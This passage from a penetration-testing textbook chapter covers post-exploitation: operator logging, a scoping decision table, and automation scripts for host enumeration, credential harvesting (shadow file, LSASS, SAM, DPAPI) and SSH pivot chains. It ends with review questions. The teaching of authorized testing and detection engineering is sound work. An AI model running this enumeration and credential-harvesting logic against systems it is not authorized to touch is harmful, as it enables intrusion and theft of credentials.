Failing to maintain access: Getting a shell, running a few commands, and then losing access because the exploited service crashed or the user logged off wastes valuable time. Establishing persistence early (within the authorized scope) ensures continued access throughout the engagement.
Not documenting as you go: Post-exploitation generates a rapid stream of findings. Testers who plan to "document everything later" inevitably lose critical details. Maintain a running log with timestamps, commands executed, output received, and observations. Tools like Obsidian, CherryTree, or even a simple terminal logger capture this information in real time.
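A few lines of shell are enough to keep that running log automatically. A sketch of a wrapper function (log_cmd and OPLOG are hypothetical names, not standard tools) that records the UTC timestamp and command line before executing each command:

```shell
# Minimal timestamped command logger: records UTC time and the full
# command line to an operator log, then runs the command.
OPLOG=$(mktemp)
log_cmd() {
    printf '[%s] %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$*" >> "$OPLOG"
    "$@"
}
log_cmd echo "situational awareness started"
cat "$OPLOG"   # each entry: [2025-01-15T08:00:00Z] command ...
```

For full-session capture, the standard script(1) utility or tmux's pipe-pane achieve the same end with terminal output included.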
Over-pivoting: Accessing every reachable system is unnecessary and increases risk. Instead, follow the engagement objectives: if the goal is to reach the domain controller, focus on the most direct path rather than compromising every system along the way.
24.14.4 Post-Exploitation Decision Framework
At each stage of post-exploitation, the tester faces decisions that balance thoroughness with risk. The following framework guides these decisions:
| Decision Point | Key Question | Action |
|---|---|---|
| Initial access obtained | Is the shell stable? | Upgrade and stabilize before proceeding |
| Privilege level assessed | Can I escalate? | Attempt escalation only with low-risk methods first |
| Persistence considered | Does the engagement require it? | Establish persistence only if authorized and needed |
| Network assessment | What systems are reachable? | Map adjacent networks passively before active scanning |
| Credential found | Is the target in scope? | Verify scope before using credentials on new systems |
| Sensitive data reached | How do I prove access? | Document without accessing actual content |
| Objective achieved | What next? | Report critical findings, assess remaining objectives |
This decision framework ensures that post-exploitation activities remain focused, controlled, and aligned with engagement objectives at every step. Deviating from this structured approach increases the risk of scope violations, detection, and unintended impact on production systems.
24.14.5 Post-Exploitation Automation and Scripting
Experienced penetration testers develop automation for repetitive post-exploitation tasks. This reduces time on target, minimizes the chance of errors, and ensures consistent data collection across engagements.
Common automation targets include:
Situational awareness scripts: Automated collection of system information, network configuration, installed software, running processes, scheduled tasks, and user accounts. These scripts run the same checks on every compromised host, ensuring nothing is missed.
#!/bin/bash
# Linux situational awareness automation
echo "=== HOSTNAME ==="
hostname && uname -a
echo "=== NETWORK ==="
ip addr show && ip route show && cat /etc/resolv.conf
echo "=== USERS ==="
grep -vE '(nologin|false)$' /etc/passwd
echo "=== SUDO ==="
sudo -l 2>/dev/null
echo "=== SUID ==="
find / -perm -4000 -type f 2>/dev/null
echo "=== CRON ==="
crontab -l 2>/dev/null && ls -la /etc/cron* 2>/dev/null
echo "=== CONNECTIONS ==="
ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null
echo "=== PROCESSES ==="
ps auxf
echo "=== INTERESTING FILES ==="
find / \( -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name "*.env" \) 2>/dev/null | head -50
Credential extraction pipelines: Automated credential harvesting that adapts to the operating system and privilege level, running appropriate tools and outputting credentials in a standardized format for subsequent use.
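As a minimal sketch of such a pipeline's dispatch logic, the following bash fragment detects the platform and privilege level and selects a harvesting plan. The specific plans (shadow file, LSASS, DPAPI) are illustrative assumptions, not a fixed toolkit; substitute whatever tools the engagement authorizes.

```shell
#!/bin/bash
# Hypothetical credential-harvesting dispatcher (sketch).
# Plans below are examples only -- adapt to the approved toolset.

detect_platform() {
    # uname is present on Linux and macOS shells; absent in most Windows shells
    if command -v uname >/dev/null 2>&1; then
        uname -s
    else
        echo "Windows"
    fi
}

select_harvest_plan() {
    local platform="$1" priv="$2"   # priv: "root", "admin", or "user"
    case "$platform/$priv" in
        Linux/root)    echo "dump /etc/shadow; collect SSH keys; check stored service credentials" ;;
        Linux/user)    echo "search home directories for keys, shell history, .env and config files" ;;
        Windows/admin) echo "dump LSASS memory; extract SAM and SYSTEM hives" ;;
        Windows/user)  echo "enumerate DPAPI blobs; check browser credential stores" ;;
        *)             echo "unknown combination: enumerate manually" ;;
    esac
}

# Example: decide the plan for the current host as an unprivileged user
select_harvest_plan "$(detect_platform)" user
```

The value of the dispatcher is consistency: every compromised host gets the same decision logic, and the standardized output feeds directly into the engagement's credential log.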
Pivot chain management: Scripts that establish and verify multi-hop tunnel configurations, ensuring that complex pivot chains remain stable throughout extended engagements.
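A simple sketch of this idea, assuming OpenSSH 7.3+ (which supports `-J`/ProxyJump): one helper builds the chained ssh command from an ordered list of hops, and another pre-checks that each hop answers on TCP/22 before the tester commits to the chain. The hostnames in the example are placeholders for compromised hops in an authorized test.

```shell
#!/bin/bash
# Sketch of pivot-chain management using OpenSSH ProxyJump.

# Build the ssh command that chains hops with -J.
# First argument: final target; remaining arguments: hops in order.
build_pivot_cmd() {
    local target="$1"; shift
    local hops
    hops=$(IFS=,; printf '%s' "$*")   # join hop list with commas
    printf 'ssh -J %s %s\n' "$hops" "$target"
}

# Verify a hop answers on TCP/22 before relying on it
# (uses bash's /dev/tcp; substitute "nc -z" if unavailable).
check_hop() {
    local host="$1"
    timeout 3 bash -c "exec 3<>/dev/tcp/${host}/22" 2>/dev/null \
        && echo "OK   ${host}" || echo "FAIL ${host}"
}

# Example: DMZ web server and app server as hops toward an internal database
build_pivot_cmd root@10.0.30.5 user@dmz-web admin@10.0.20.7
# prints: ssh -J user@dmz-web,admin@10.0.20.7 root@10.0.30.5
```

Re-running the liveness check periodically during a long engagement catches a collapsed hop early, before a dead tunnel silently breaks every tool routed through it.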
Blue Team Perspective: The automation used by penetration testers mirrors the automation used by real adversaries. Red team automation scripts provide excellent material for detection engineering. Security teams should analyze common post-exploitation automation patterns and build detection rules that identify their behavioral signatures -- rapid sequential process creation, bulk file access patterns, systematic network probing, and credential store access attempts.
24.15 Summary
Post-exploitation and pivoting transform a single vulnerability into a comprehensive security assessment. Through systematic situational awareness, privilege escalation, persistence establishment, lateral movement, and controlled data exfiltration, ethical hackers demonstrate the real-world impact of security weaknesses.
The techniques covered in this chapter -- SSH tunneling, Chisel, Ligolo-ng, Pass-the-Hash, Kerberoasting, and numerous persistence mechanisms -- represent the core toolkit of post-exploitation activities. However, the tools are secondary to the methodology: understanding the target environment, identifying paths to objectives, and executing with precision while maintaining strict adherence to ethical and legal boundaries.
The most valuable penetration tests are those that tell a compelling story -- tracing a path from an initial vulnerability through lateral movement and pivoting to the organization's most critical assets. This narrative approach helps stakeholders understand not just that vulnerabilities exist, but how they combine to create systemic risk that demands immediate remediation.
As we continue through this part of the book, the concepts introduced here will serve as the foundation for more advanced topics. The ability to maintain access, move through networks, and operate effectively in post-exploitation scenarios is what separates surface-level vulnerability scanning from true penetration testing.
Review Questions
- Explain the difference between pivoting and lateral movement. How do these concepts relate to each other in a penetration test?
- Why is the post-exploitation phase often more valuable than the initial exploitation phase in demonstrating security risk to an organization?
- Describe three persistence mechanisms for Linux and three for Windows. For each, explain how a defender might detect the mechanism.
- Compare and contrast SSH tunneling, Chisel, and Ligolo-ng as pivoting tools. In what scenarios would you choose each?
- What ethical obligations does a penetration tester have regarding data handling during the post-exploitation phase?
- Explain how Pass-the-Hash works and why it remains effective in many Windows environments despite being a well-known technique.
- Describe the cleanup process at the end of a penetration test. What are the consequences of inadequate cleanup?
- How does lateral movement in cloud environments differ from traditional on-premises lateral movement?
- In the MedSecure scenario, what specific network segmentation failure enabled the attacker to pivot from the DMZ to the internal database? What remediation would you recommend?
- Why is maintaining a detailed log of all post-exploitation activities essential for both the tester and the client?